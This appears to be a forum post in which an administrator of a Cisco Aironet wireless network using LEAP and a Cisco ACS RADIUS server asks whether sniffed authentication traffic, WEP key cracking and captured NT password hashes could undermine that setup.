I have implemented a Cisco Wireless LAN with Cisco Aironet 350 Series AP's and Radio Cards. We were concerned about the issues with Static WEP and have implemented a Cisco Secure ACS Radius Server to provide Dynamic WEP (Leap enabled on the Clients). This Radius Server authenticates users by comparing their Login Credentials to an NT User Group setup for Wireless Users. If the User is in the Wireless Group, the Radius Server will auththenticate them and give them access to the Wireless Network. This is Cisco's preferred method to deal with the Security Issues of Static WEP.
Now for some questions:
In Sniffing the traffic during the Wireless Authentication I notice that the User Name and NT Domain information are "In the Clear". Assuming that someone is Sniffing this traffic, the only additional thing they will need is the Users Password, and they could potentially get access to the WLAN. How is the NT Password encrypted when it is sent to the Authenticating RADIUS (Cisco ACS) Server? Also, if someone captures enough data through the day of one user session, what's to prevent them from Brute Forcing the WEP Key with various tools that are available now to do this (http://airsnort.sourceforge.net/)? If they captured enough traffic, and they derive the Dynamic WEP Key, they could then parse through all the Captured Data unencrypted as they now have the Dynamic Session based WEP. With that, if the user logged into any other NT Servers Etc.. during their session, isn't it conceivable that the Hacker will now have the Users NT Password HASH? Once they have that and Brute Force it, they will have all the information they need to LEAP Authenticate. So LEAP is only as safe as the NT UserID and Password?
Any one have any thoughts on this?